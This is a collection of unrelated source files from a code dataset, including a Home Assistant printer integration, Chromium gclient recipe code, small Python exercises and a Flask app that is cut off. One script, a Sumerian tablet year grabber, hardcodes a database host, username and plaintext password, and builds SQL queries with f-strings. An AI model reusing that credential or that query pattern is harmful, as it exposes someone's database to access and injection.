author_2)\nbook_repository.save(book_4)\n","repo_name":"JoshMcc1/week_4_day_3","sub_path":"console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36359819378","text":"\"\"\"\nSupport for HP Printer.\nFor more details about this platform, please refer to the documentation at\nhttps://home-assistant.io/components/hpprinter/\n\"\"\"\nfrom datetime import datetime, timedelta\nimport logging\nimport sys\nfrom typing import Optional\n\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers.dispatcher import async_dispatcher_send\nfrom homeassistant.helpers.entity_registry import EntityRegistry, async_get\nfrom homeassistant.helpers.event import async_track_time_interval\n\nfrom ..helpers.const import *\nfrom ..managers.HPDeviceData import HPDeviceData\nfrom ..managers.configuration_manager import ConfigManager\nfrom ..managers.device_manager import DeviceManager\nfrom ..managers.entity_manager import EntityManager\nfrom ..models.config_data import ConfigData\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass HPPrinterHomeAssistant:\n def __init__(self, hass: HomeAssistant):\n self._hass = hass\n\n self._remove_async_track_time = None\n\n self._is_initialized = False\n self._is_updating = False\n\n self._entity_registry = None\n\n self._api = None\n self._entity_manager = None\n self._device_manager = None\n self._data_manager = None\n\n self._config_manager = ConfigManager()\n\n def update_entities(now):\n self._hass.async_create_task(self.async_update(now))\n\n self._update_entities = update_entities\n\n @property\n def data(self):\n return self._data_manager.device_data\n\n @property\n def data_manager(self) -> HPDeviceData:\n return self._data_manager\n\n @property\n def entity_manager(self) -> EntityManager:\n return self._entity_manager\n\n @property\n def device_manager(self) -> DeviceManager:\n return self._device_manager\n\n @property\n def entity_registry(self) -> EntityRegistry:\n return self._entity_registry\n\n @property\n def config_data(self) -> Optional[ConfigData]:\n if self._config_manager is not None:\n return self._config_manager.data\n\n return None\n\n async def async_init(self, entry: ConfigEntry):\n try:\n self._config_manager.update(entry)\n\n self._data_manager = HPDeviceData(self._hass, self._config_manager)\n self._entity_manager = EntityManager(self._hass, self)\n self._device_manager = DeviceManager(self._hass, self)\n\n self._hass.loop.create_task(self._async_init())\n except Exception as ex:\n exc_type, exc_obj, tb = sys.exc_info()\n line_number = tb.tb_lineno\n\n _LOGGER.error(f\"Failed to async_init, error: {ex}, line: {line_number}\")\n\n async def _async_init(self):\n await self._data_manager.initialize()\n\n self._entity_registry = async_get(self._hass)\n\n load = self._hass.config_entries.async_forward_entry_setup\n\n for domain in SIGNALS:\n await load(self._config_manager.config_entry, domain)\n\n self._is_initialized = True\n\n await self.async_update_entry()\n\n async def async_update_entry(self, entry: ConfigEntry = None):\n _LOGGER.debug(\"Updating config entry\")\n\n is_update = entry is not None\n\n if is_update:\n _LOGGER.info(f\"Handling ConfigEntry change: {entry.as_dict()}\")\n\n previous_interval = self.config_data.update_interval\n\n self._config_manager.update(entry)\n\n current_interval = self.config_data.update_interval\n\n is_interval_changed = previous_interval != current_interval\n\n if is_interval_changed and self._remove_async_track_time is not None:\n msg = f\"ConfigEntry interval changed from {previous_interval} to {current_interval}\"\n _LOGGER.info(msg)\n\n self._remove_async_track_time()\n self._remove_async_track_time = None\n else:\n entry = self._config_manager.config_entry\n\n _LOGGER.info(f\"Handling ConfigEntry initialization: {entry.as_dict()}\")\n\n current_interval = self.config_data.update_interval\n\n if self._remove_async_track_time is None:\n interval = timedelta(seconds=current_interval)\n\n self._remove_async_track_time = async_track_time_interval(\n self._hass, self._update_entities, interval\n )\n\n await self.async_update(datetime.now())\n\n async def async_remove(self):\n config_entry = self._config_manager.config_entry\n _LOGGER.info(f\"Removing current integration - {config_entry.title}\")\n\n if self._remove_async_track_time is not None:\n self._remove_async_track_time()\n self._remove_async_track_time = None\n\n unload = self._hass.config_entries.async_forward_entry_unload\n\n for domain in SIGNALS:\n await unload(config_entry, domain)\n\n await self._device_manager.async_remove()\n\n _LOGGER.info(f\"Current integration ({config_entry.title}) removed\")\n\n async def async_update(self, event_time):\n if not self._is_initialized:\n _LOGGER.info(f\"NOT INITIALIZED - Failed updating @{event_time}\")\n return\n\n try:\n if self._is_updating:\n _LOGGER.debug(f\"Skip updating @{event_time}\")\n return\n\n _LOGGER.debug(f\"Updating @{event_time}\")\n\n self._is_updating = True\n\n await self.data_manager.update()\n\n self.device_manager.update()\n self.entity_manager.update()\n\n await self.dispatch_all()\n except Exception as ex:\n exc_type, exc_obj, tb = sys.exc_info()\n line_number = tb.tb_lineno\n\n _LOGGER.error(f\"Failed to async_update, Error: {ex}, Line: {line_number}\")\n\n self._is_updating = False\n\n async def delete_entity(self, domain, name):\n try:\n entity = self.entity_manager.get_entity(domain, name)\n device_name = entity.device_name\n unique_id = entity.unique_id\n\n self.entity_manager.delete_entity(domain, name)\n\n device_in_use = self.entity_manager.is_device_name_in_use(device_name)\n\n entity_id = self.entity_registry.async_get_entity_id(\n domain, DOMAIN, unique_id\n )\n self.entity_registry.async_remove(entity_id)\n\n if not device_in_use:\n await self.device_manager.delete_device(device_name)\n except Exception as ex:\n exc_type, exc_obj, tb = sys.exc_info()\n line_number = tb.tb_lineno\n\n _LOGGER.error(f\"Failed to delete_entity, Error: {ex}, Line: {line_number}\")\n\n async def dispatch_all(self):\n if not self._is_initialized:\n _LOGGER.info(f\"NOT INITIALIZED - Failed discovering components\")\n return\n\n for domain in SIGNALS:\n signal = SIGNALS.get(domain)\n\n async_dispatcher_send(self._hass, signal)\n","repo_name":"elad-bar/ha-hpprinter","sub_path":"custom_components/hpprinter/managers/home_assistant.py","file_name":"home_assistant.py","file_ext":"py","file_size_in_byte":7008,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"52"} +{"seq_id":"19712899728","text":"'''Crie uma função que verifica se uma senha é forte ou fraca, sendo:\naté 5 caracteres > fraca\nletras e números > forte\nletras, numeros e pontuação > muito forte'''\n\nimport string\n\ndef caracteres_senha(sen):\n letras = any(a.isalpha() for a in sen)\n numero = any(a.isdigit() for a in sen)\n pontuacao = any(a in string.punctuation for a in sen)\n \n if letras and numero and pontuacao:\n return \"Sua senha é muito forte\"\n elif letras and numero:\n return \"Sua senha é forte\"\n elif letras:\n return \"Sua senha é fraca\"\n else:\n return \"Sua senha deve conter letras e números.\"\n \ndef nivel_senha(s):\n if len(s) < 5:\n print(\"Sua senha é fraca\")\n else:\n mensagem = caracteres_senha(s)\n print(mensagem)\n \nsenha = input(\"Digite sua senha: \")\n\nnivel_senha(senha)","repo_name":"izabelarc/backend","sub_path":"funções/exercicio8.py","file_name":"exercicio8.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12546855395","text":"from recipe_engine import recipe_api\n\n\nclass RevisionResolver(object):\n \"\"\"Resolves the revision based on build properties.\"\"\"\n\n def resolve(self, properties): # pragma: no cover\n raise NotImplementedError()\n\n\nclass RevisionFallbackChain(RevisionResolver):\n \"\"\"Specify that a given project's sync revision follows the fallback chain.\"\"\"\n def __init__(self, default=None):\n self._default = default\n\n def resolve(self, properties):\n \"\"\"Resolve the revision via the revision fallback chain.\n\n If the given revision was set using the revision_fallback_chain() function,\n this function will follow the chain, looking at relevant build properties\n until it finds one set or reaches the end of the chain and returns the\n default. If the given revision was not set using revision_fallback_chain(),\n this function just returns it as-is.\n \"\"\"\n return (properties.get('parent_got_revision') or\n properties.get('orig_revision') or\n properties.get('revision') or\n self._default)\n\n\ndef jsonish_to_python(spec, is_top=False):\n \"\"\"Turn a json spec into a python parsable object.\n\n This exists because Gclient specs, while resembling json, is actually\n ingested using a python \"eval()\". Therefore a bit of plumming is required\n to turn our newly constructed Gclient spec into a gclient-readable spec.\n \"\"\"\n ret = ''\n if is_top: # We're the 'top' level, so treat this dict as a suite.\n ret = '\\n'.join(\n '%s = %s' % (k, jsonish_to_python(spec[k])) for k in sorted(spec)\n )\n else:\n if isinstance(spec, dict):\n ret += '{'\n ret += ', '.join(\n \"%s: %s\" % (repr(str(k)), jsonish_to_python(spec[k]))\n for k in sorted(spec)\n )\n ret += '}'\n elif isinstance(spec, list):\n ret += '['\n ret += ', '.join(jsonish_to_python(x) for x in spec)\n ret += ']'\n elif isinstance(spec, basestring):\n ret = repr(str(spec))\n else:\n ret = repr(spec)\n return ret\n\nclass GclientApi(recipe_api.RecipeApi):\n # Singleton object to indicate to checkout() that we should run a revert if\n # we detect that we're on the tryserver.\n RevertOnTryserver = object()\n\n def __init__(self, **kwargs):\n super(GclientApi, self).__init__(**kwargs)\n self.USE_MIRROR = None\n self._spec_alias = None\n\n def __call__(self, name, cmd, infra_step=True, **kwargs):\n \"\"\"Wrapper for easy calling of gclient steps.\"\"\"\n assert isinstance(cmd, (list, tuple))\n prefix = 'gclient '\n if self.spec_alias:\n prefix = ('[spec: %s] ' % self.spec_alias) + prefix\n\n # TODO(phajdan.jr): create a helper for adding to PATH.\n env = self.m.context.env\n env.setdefault('PATH', '%(PATH)s')\n env['PATH'] = self.m.path.pathsep.join([\n env['PATH'], str(self._module.PACKAGE_REPO_ROOT)])\n\n with self.m.context(env=env):\n return self.m.python(prefix + name,\n self.package_repo_resource('gclient.py'),\n cmd,\n infra_step=infra_step,\n **kwargs)\n\n @property\n def use_mirror(self):\n \"\"\"Indicates if gclient will use mirrors in its configuration.\"\"\"\n if self.USE_MIRROR is None:\n self.USE_MIRROR = self.m.properties.get('use_mirror', True)\n return self.USE_MIRROR\n\n @use_mirror.setter\n def use_mirror(self, val): # pragma: no cover\n self.USE_MIRROR = val\n\n @property\n def spec_alias(self):\n \"\"\"Optional name for the current spec for step naming.\"\"\"\n return self._spec_alias\n\n @spec_alias.setter\n def spec_alias(self, name):\n self._spec_alias = name\n\n @spec_alias.deleter\n def spec_alias(self):\n self._spec_alias = None\n\n def get_config_defaults(self):\n return {\n 'USE_MIRROR': self.use_mirror,\n 'CACHE_DIR': self.m.infra_paths.default_git_cache_dir,\n }\n\n @staticmethod\n def config_to_pythonish(cfg):\n return jsonish_to_python(cfg.as_jsonish(), True)\n\n # TODO(machenbach): Remove this method when the old mapping is deprecated.\n @staticmethod\n def got_revision_reverse_mapping(cfg):\n \"\"\"Returns the merged got_revision_reverse_mapping.\n\n Returns (dict): A mapping from property name -> project name. It merges the\n values of the deprecated got_revision_mapping and the new\n got_revision_reverse_mapping.\n \"\"\"\n rev_map = cfg.got_revision_mapping.as_jsonish()\n reverse_rev_map = cfg.got_revision_reverse_mapping.as_jsonish()\n combined_length = len(rev_map) + len(reverse_rev_map)\n reverse_rev_map.update({v: k for k, v in rev_map.iteritems()})\n\n # Make sure we never have duplicate values in the old map.\n assert combined_length == len(reverse_rev_map)\n return reverse_rev_map\n\n def resolve_revision(self, revision):\n if hasattr(revision, 'resolve'):\n return revision.resolve(self.m.properties)\n return revision\n\n def sync(self, cfg, extra_sync_flags=None, **kwargs):\n revisions = []\n self.set_patch_project_revision(self.m.properties.get('patch_project'), cfg)\n for i, s in enumerate(cfg.solutions):\n if i == 0 and s.revision is None:\n s.revision = RevisionFallbackChain()\n\n if s.revision is not None and s.revision != '':\n fixed_revision = self.resolve_revision(s.revision)\n if fixed_revision:\n revisions.extend(['--revision', '%s@%s' % (s.name, fixed_revision)])\n\n for name, revision in sorted(cfg.revisions.items()):\n fixed_revision = self.resolve_revision(revision)\n if fixed_revision:\n revisions.extend(['--revision', '%s@%s' % (name, fixed_revision)])\n\n test_data_paths = set(self.got_revision_reverse_mapping(cfg).values() +\n [s.name for s in cfg.solutions])\n step_test_data = lambda: (\n self.test_api.output_json(test_data_paths))\n try:\n # clean() isn't used because the gclient sync flags passed in checkout()\n # do much the same thing, and they're more correct than doing a separate\n # 'gclient revert' because it makes sure the other args are correct when\n # a repo was deleted and needs to be re-cloned (notably\n # --with_branch_heads), whereas 'revert' uses default args for clone\n # operations.\n #\n # TODO(mmoss): To be like current official builders, this step could\n # just delete the whole /build/ directory and start each\n # build from scratch. That might be the least bad solution, at least\n # until we have a reliable gclient method to produce a pristine working\n # dir for git-based builds (e.g. maybe some combination of 'git\n # reset/clean -fx' and removing the 'out' directory).\n j = '-j2' if self.m.platform.is_win else '-j8'\n args = ['sync', '--verbose', '--nohooks', j, '--reset', '--force',\n '--upstream', '--no-nag-max', '--with_branch_heads',\n '--with_tags']\n args.extend(extra_sync_flags or [])\n if cfg.delete_unversioned_trees:\n args.append('--delete_unversioned_trees')\n self('sync', args + revisions +\n ['--output-json', self.m.json.output()],\n step_test_data=step_test_data,\n **kwargs)\n finally:\n result = self.m.step.active_result\n solutions = result.json.output['solutions']\n for propname, path in sorted(\n self.got_revision_reverse_mapping(cfg).iteritems()):\n # gclient json paths always end with a slash\n info = solutions.get(path + '/') or solutions.get(path)\n if info:\n result.presentation.properties[propname] = info['revision']\n\n return result\n\n def inject_parent_got_revision(self, gclient_config=None, override=False):\n \"\"\"Match gclient config to build revisions obtained from build_properties.\n\n Args:\n gclient_config (gclient config object) - The config to manipulate. A value\n of None manipulates the module's built-in config (self.c).\n override (bool) - If True, will forcibly set revision and custom_vars\n even if the config already contains values for them.\n \"\"\"\n cfg = gclient_config or self.c\n\n for prop, custom_var in cfg.parent_got_revision_mapping.iteritems():\n val = str(self.m.properties.get(prop, ''))\n # TODO(infra): Fix coverage.\n if val: # pragma: no cover\n # Special case for 'src', inject into solutions[0]\n if custom_var is None:\n # This is not covered because we are deprecating this feature and\n # it is no longer used by the public recipes.\n if cfg.solutions[0].revision is None or override: # pragma: no cover\n cfg.solutions[0].revision = val\n else:\n if custom_var not in cfg.solutions[0].custom_vars or override:\n cfg.solutions[0].custom_vars[custom_var] = val\n\n def checkout(self, gclient_config=None, revert=RevertOnTryserver,\n inject_parent_got_revision=True, extra_sync_flags=None,\n **kwargs):\n \"\"\"Return a step generator function for gclient checkouts.\"\"\"\n cfg = gclient_config or self.c\n assert cfg.complete()\n\n if revert is self.RevertOnTryserver:\n revert = self.m.tryserver.is_tryserver\n\n if inject_parent_got_revision:\n self.inject_parent_got_revision(cfg, override=True)\n\n self('setup', ['config', '--spec', self.config_to_pythonish(cfg)], **kwargs)\n\n sync_step = None\n try:\n sync_step = self.sync(cfg, extra_sync_flags=extra_sync_flags, **kwargs)\n\n cfg_cmds = [\n ('user.name', 'local_bot'),\n ('user.email', 'local_bot@example.com'),\n ]\n for var, val in cfg_cmds:\n name = 'recurse (git config %s)' % var\n self(name, ['recurse', 'git', 'config', var, val], **kwargs)\n finally:\n cwd = kwargs.get('cwd', self.m.path['start_dir'])\n if 'checkout' not in self.m.path:\n self.m.path['checkout'] = cwd.join(\n *cfg.solutions[0].name.split(self.m.path.sep))\n\n return sync_step\n\n def runhooks(self, args=None, name='runhooks', **kwargs):\n args = args or []\n assert isinstance(args, (list, tuple))\n with self.m.context(cwd=(self.m.context.cwd or self.m.path['checkout'])):\n return self(name, ['runhooks'] + list(args), infra_step=False, **kwargs)\n\n @property\n def is_blink_mode(self):\n \"\"\" Indicates wether the caller is to use the Blink config rather than the\n Chromium config. This may happen for one of two reasons:\n 1. The builder is configured to always use TOT Blink. (factory property\n top_of_tree_blink=True)\n 2. A try job comes in that applies to the Blink tree. (patch_project is\n blink)\n \"\"\"\n return (\n self.m.properties.get('top_of_tree_blink') or\n self.m.properties.get('patch_project') == 'blink')\n\n def break_locks(self):\n \"\"\"Remove all index.lock files. If a previous run of git crashed, bot was\n reset, etc... we might end up with leftover index.lock files.\n \"\"\"\n self.m.python.inline(\n 'cleanup index.lock',\n \"\"\"\n import os, sys\n\n build_path = sys.argv[1]\n if os.path.exists(build_path):\n for (path, dir, files) in os.walk(build_path):\n for cur_file in files:\n if cur_file.endswith('index.lock'):\n path_to_file = os.path.join(path, cur_file)\n print 'deleting %s' % path_to_file\n os.remove(path_to_file)\n \"\"\",\n args=[self.m.path['start_dir']],\n infra_step=True,\n )\n\n def calculate_patch_root(self, patch_project, gclient_config=None,\n patch_repo=None):\n \"\"\"Returns path where a patch should be applied to based patch_project.\n\n Maps the patch's repo to a path of directories relative to checkout's root,\n which describe where to place the patch. If no mapping is found for the\n repo url, falls back to trying to find a mapping for the old-style\n \"patch_project\".\n\n For now, considers only first solution (c.solutions[0]), but in theory can\n be extended to all of them.\n\n See patch_projects and repo_path_map solution config property.\n\n Returns:\n Relative path, including solution's root.\n If patch_project is not given or not recognized, it'll be just first\n solution root.\n \"\"\"\n cfg = gclient_config or self.c\n root, _ = cfg.repo_path_map.get(patch_repo, ('', ''))\n if not root:\n root, _ = cfg.patch_projects.get(patch_project, ('', ''))\n if not root:\n # Failure case - assume patch is for first solution, as this is what most\n # projects rely on.\n return cfg.solutions[0].name\n # Note, that c.patch_projects contains patch roots as\n # slash(/)-separated path, which are roots of the respective project repos\n # and include actual solution name in them.\n return self.m.path.join(*root.split('/'))\n\n def set_patch_project_revision(self, patch_project, gclient_config=None):\n \"\"\"Updates config revision corresponding to patch_project.\n\n Useful for bot_update only, as this is the only consumer of gclient's config\n revision map. This doesn't overwrite the revision if it was already set.\n \"\"\"\n assert patch_project is None or isinstance(patch_project, basestring)\n cfg = gclient_config or self.c\n path, revision = cfg.patch_projects.get(patch_project, (None, None))\n if path and revision and path not in cfg.revisions:\n cfg.revisions[path] = revision\n","repo_name":"kiwibrowser/src","sub_path":"third_party/depot_tools/recipes/recipe_modules/gclient/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":13347,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"72431725604","text":"# scope = The region that a variable is recognized\n# A variable is only available from inside the region it is created.\n# A global and locally scoped versions of a variable can be created\n# LEBG => L = local > E = enclosing > G = global > B = Built-in\n\nname = \"Marcos\" # global scope (available inside & outside this function)\n\n\ndef display_name():\n name = \"Ben-hur\" # local scope (available only inside this function)\n print(name)\n\n\ndisplay_name()\nprint(name)\n","repo_name":"MarcosBenHurSilva/ProjetosPython","sub_path":"variable_scope.py","file_name":"variable_scope.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42431830035","text":"#Para tributar un determinado impuesto se debe ser mayor de 16 años y tener unos ingresos \n#iguales o superiores a 1000 € mensuales. Escribir un programa que pregunte \n#al usuario su edad y sus ingresos mensuales y muestre por pantalla si el usuario tiene que tributar o no.\nprint(\"Pagos tributarios\")\nage = int(input(\"Ingrese su edad:\"))\nincome = float(input(\"Especifique sus ingresos mensuales:\"))\nif age >= 16:\n if income >= 1000:\n print(\"Usted debe de presentar su pago tributario.\")\n else:\n print(\"Usted no debe presentar pago tributario.\")\nelse:\n print(\"Usted no debe presentar pago tributario.\")","repo_name":"MauricioMunguia10/EjerciciosPython","sub_path":"Condicionales/ejercicio5.py","file_name":"ejercicio5.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72769351526","text":"branco = \" \"\nvelha = [[' ' if numero % 2 == 0 else ' ' for numero in range(\n 1, 4)] for valor in range(1, 4)]\ntoken = [\"X\", \"O\"]\n\n\ndef criarBoard():\n return velha\n\n\ndef printBoard(board):\n for i in range(3):\n print('|'.join(board[i]))\n if(i < 2):\n print('------')\n print()\n\n\ndef getInputValido(mensagem):\n try:\n n = int(input(mensagem))\n if n >= 1 and n <= 3:\n return n - 1\n else:\n print(\"Numero precisa estar entre 1 e 3\")\n return getInputValido(mensagem)\n except:\n print('Número inválido')\n return getInputValido(mensagem)\n\ndef verificaMovimento(board, linha , coluna):\n if(board[linha][coluna] == branco):\n return True\n else:\n return False\n\ndef fazMovimento(board, linha, coluna, jogador):\n board[linha][coluna] = token[jogador]\n\n\ndef verificarGanhador(board):\n # Linha\n for linha in range(3):\n if board[linha][0] == board[linha][1] and board[linha][1] == board[linha][2] and board[linha][0] != branco:\n return board[linha][0]\n # Coluna\n for coluna in range(3):\n if board[0][coluna] == board[1][coluna] and board[1][coluna] == board[2][coluna] and board[0][coluna] != branco:\n return board[0][coluna]\n\n # Diagonal Principal\n if board[0][0] != branco and board[0][0] == board[1][1] and board[1][1] == board[2][2]:\n return board[0][0]\n\n # Diagonal Secundária\n if board[0][2] != branco and board[0][2] == board[1][1] and board[1][1] == board[2][0]:\n return board[0][2]\n\n for i in range(3):\n for j in range(3):\n if board[i][j] == branco:\n return False\n return 'Empatou'","repo_name":"ldsleticia/jogo_da_velha","sub_path":"jogo_da_velha.py","file_name":"jogo_da_velha.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7858300887","text":"# Multi Year Grabber\n# May 2022\n# Elliot Fisk\n# ---------------\n# gets years from the raw tablet data\n\nimport os\nimport psutil\nimport multiprocessing as mp\nfrom Database.SQLfuncs import SQLfuncs\nimport re\n\ndef thread_function(path, tablets, cpu, progress):\n progress[cpu - 1] = 0\n db = SQLfuncs('sumerian-social-network.clzdkdgg3zul.us-west-2.rds.amazonaws.com', 'root', '2b928S#%')\n for tabid in tablets:\n progress[cpu - 1] += 1\n tab = open(path + tabid, 'r', encoding='utf-8')\n current_line = tab.readline()\n\n buf = \"mu \"\n while current_line != '':\n if current_line.find(\"[year]\") != -1:\n current_line = tab.readline()\n end = False\n while current_line != '' and not end:\n buf += re.split(' |\\t', current_line)[1]\n buf += ' '\n end = (-1 != current_line.find(\"\\tV\") and -1 == current_line.find('us2-sa'))\n current_line = tab.readline()\n db.execute_insert(f'insert into rawyearsfixed values (\\\"{buf}\\\", \\\"{tabid[0:7]}\\\");')\n buf = \"mu \"\n else:\n current_line = tab.readline()\n\npath = os.getcwd() + '/Dataset/Translated/'\n\nif __name__ == '__main__':\n n_cpus = psutil.cpu_count()\n procs = list()\n progress = mp.Array('i', range(n_cpus))\n tablets = os.listdir(path)\n num_tablets = len(tablets)\n thread_size = int(num_tablets/n_cpus)\n pos = 0\n for cpu in range(n_cpus - 1):\n proc = mp.Process(target=thread_function, args=(path, tablets[pos:(pos + thread_size - 1)], cpu, progress,))\n print(\"started new thread on tablets[%d,%d]\" % (pos, (pos + thread_size - 1)))\n procs.append(proc)\n pos += thread_size\n proc = mp.Process(target=thread_function, args=(path, tablets[pos:(num_tablets - 1)], n_cpus, progress,))\n procs.append(proc)\n\n for p in procs:\n p.start()\n\n sum = 0\n while sum < num_tablets:\n sum = 0\n for i in range(n_cpus):\n sum += progress[i]\n print(\"%d/%d\" % (sum, num_tablets), end='\\r')\n\n for p in procs:\n p.join()","repo_name":"NicholasJUhlhorn/Sumerian-Social-Network-Project","sub_path":"Python/Core/DataCollection/multiYearGrabber.py","file_name":"multiYearGrabber.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9106816061","text":"class Candle:\n\n def __init__(self, t: int, o: float, h: float, l: float, c: float, v: float) -> None:\n self.t = t # in secs of the start of teh duration\n self.h = h\n self.l = l\n self.o = o\n self.c = c\n self.v = v\n\n def __repr__(self) -> str:\n return str([self.t, self.o, self.h, self.l, self.c, self.v])\n","repo_name":"iamarya/strategy-runner","sub_path":"src/models/candle.py","file_name":"candle.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42330242190","text":"#!/usr/bin/env python3\nfrom .models import equipment\nfrom django import forms\n\n\nclass equipmentForm(forms.ModelForm):\n\n class Meta:\n bu = [('KIU', 'KIU'), ('SIU', 'SIU'), ('AGU', 'AGU'), ('NAU', 'NAU'), ('ADU', 'ADU')]\n bl = [('SWT', 'SWT'), ('SLS', 'SLS'), ('WHM', 'WHM'), ('DST', 'DST')]\n model = equipment\n fields = '__all__'\n widgets = {\n 'description': forms.Textarea(attrs={'rows': 2}),\n 'BU': forms.Select(choices=bu),\n 'BL': forms.Select(choices=bl),\n }\n","repo_name":"wcqrwtqr/Equipment-History-tracker","sub_path":"equipmentTraker2/equipment/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7803825880","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def mergeTwoLists(self, list1: Optional[ListNode], list2: Optional[ListNode]) -> Optional[ListNode]:\n # ITERATIVE\n result = ListNode()\n result_pointer = result\n while list1 and list2:\n if list1.val >= list2.val:\n result_pointer.next = ListNode(val=list2.val)\n list2 = list2.next\n result_pointer = result_pointer.next\n else:\n result_pointer.next = ListNode(val=list1.val)\n list1 = list1.next\n result_pointer = result_pointer.next\n if list1:\n result_pointer.next = list1\n elif list2:\n result_pointer.next = list2\n return result.next\n \n \n # # RECURSIVE\n # if list1 is None and list2 is None:\n # return None\n # elif list1 is None and list2:\n # return list2\n # elif list1 and list2 is None:\n # return list1\n # else:\n # if list1.val >= list2.val:\n # return ListNode(list2.val, self.mergeTwoLists(list1, list2.next))\n # else:\n # return ListNode(list1.val, self.mergeTwoLists(list1.next, list2))\n","repo_name":"james950417/leetcode_py3","sub_path":"0021_merge_two_sorted_lists.py","file_name":"0021_merge_two_sorted_lists.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13156164427","text":"import re\n\nfrom Appearence import Appearance\n\n\nclass InvertedIndex:\n def __init__(self, db, letter_case):\n self.index = dict()\n self.db = db\n self.letter_case = letter_case\n\n def __repr__(self):\n return str(self.index)\n\n def index_document(self, document):\n clean_text = re.sub(r'[^\\w\\s]', '', document['text']).replace('\\n', ' ')\n if not self.letter_case:\n clean_text = clean_text.lower()\n terms = re.split(' ', clean_text)\n appearances_dict = dict()\n for term in terms:\n term_frequency = appearances_dict[term].frequency if term in appearances_dict else 0\n appearances_dict[term] = Appearance(document['id'], term_frequency + 1, document['name'])\n update_dict = {key: [appearance] if key not in self.index else self.index[key] + [appearance]\n for (key, appearance) in appearances_dict.items()}\n self.index.update(update_dict)\n self.db.add(document)\n return document\n\n def lookup_query(self, query):\n return {term: self.index[term] for term in query.split(' ') if term in self.index}\n\n def create_inverted_index(self, documents):\n id = 0\n for document in documents:\n document = {'id': id, 'name': document, 'text': open(document).read()}\n self.index_document(document)\n id += 1\n","repo_name":"Karina5005/QuotesOriginality","sub_path":"src/InvertedIndex.py","file_name":"InvertedIndex.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3129168003","text":"import random\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nrandom.seed(6168850734)\n\nMold = [{\"Offset\":-2.5,\"Variation\":0.625,\"Data\":[]},\n {\"Offset\":0,\"Variation\":0.313,\"Data\":[]}]\n\nOperators = [{\"Name\":\"Andy\",\"Offset\":3.0,\"Variation\":1.25,\"Data\":[]},\n {\"Name\":\"Susan\",\"Offset\":1.25,\"Variation\":0.125,\"Data\":[]},\n {\"Name\":\"Brian\",\"Offset\":-5.5,\"Variation\":0.45,\"Data\":[]}]\n\nWeibull_factor = [{\"Name\":\"Glass fill\",\"Scale\":1,\"Shape\":1,\"Data\":[]}]\n\nParts = []\n\nreplicates = 20\nops = int(len(Operators))\ncavities = int(len(Mold))\nfactors = int(len(Weibull_factor))\nn = ops*cavities*replicates\n\nfor i in range(n):\n op_data = random.normalvariate(Operators[i%ops][\"Offset\"],\n Operators[i%ops][\"Variation\"])\n Operators[i%ops][\"Data\"].append(op_data)\n\n cavity_data = random.normalvariate(Mold[i%cavities][\"Offset\"],\n Mold[i%cavities][\"Variation\"]) \n Mold[i%cavities][\"Data\"].append(cavity_data)\n\n weibull_data = random.weibullvariate(Weibull_factor[i%factors][\"Scale\"],\n Weibull_factor[i%factors][\"Shape\"])\n Weibull_factor[i%factors][\"Data\"].append(weibull_data)\n\n part_data = op_data + cavity_data + weibull_data\n Parts.append({\"Operator\":i%ops,\n \"Cavity\":i%cavities,\n \"Weibull factor\":i%factors,\n \"Data\":part_data})\n\ndf = pd.DataFrame.from_dict(Parts)\ndf.to_csv('Data.csv')\n# print(Parts)\n","repo_name":"gmclapp/Personal_library","sub_path":"Normality_demonstrator.py","file_name":"Normality_demonstrator.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10437042489","text":"from flask import Flask, request, jsonify\nfrom symptom_checker import SymptomChecker\nimport requests\nimport sqlite3 as sql\nimport base64\nimport json\n\napp = Flask(__name__)\ndb = \"database/db.sqlite\"\n\ndiag_checker = SymptomChecker()\ndiag_checker.train_model()\n\n@app.route('/diagnostic', methods=['POST'])\ndef diagnostic():\n try:\n ids = request.get_json()[\"ids\"]\n diagnostic = diag_checker.ml_diagnostic(ids)[0]\n response = {\"diagnostic\": diag_checker.id_to_diag(diagnostic)}\n return jsonify(response)\n except Exception as e:\n return jsonify({\"error\": str(e)})\n\n\n@app.route('/register', methods=['POST'])\ndef register():\n try:\n data = request.get_json()\n role = data[\"role\"]\n id = data[\"identifier\"]\n\n response = {\"alerts\": []}\n\n if role == \"ROLE_DOCTOR\":\n with sql.connect(db) as con:\n con.row_factory = sql.Row\n cursor = con.cursor()\n\n # remove all old alerts\n cursor.execute(\"DELETE FROM alerts WHERE (JulianDay() - JulianDay(alert_time)) * 24 * 60 >= 15\")\n\n cursor.execute(\"SELECT * FROM doctors WHERE identifier = ?\", (id,))\n if 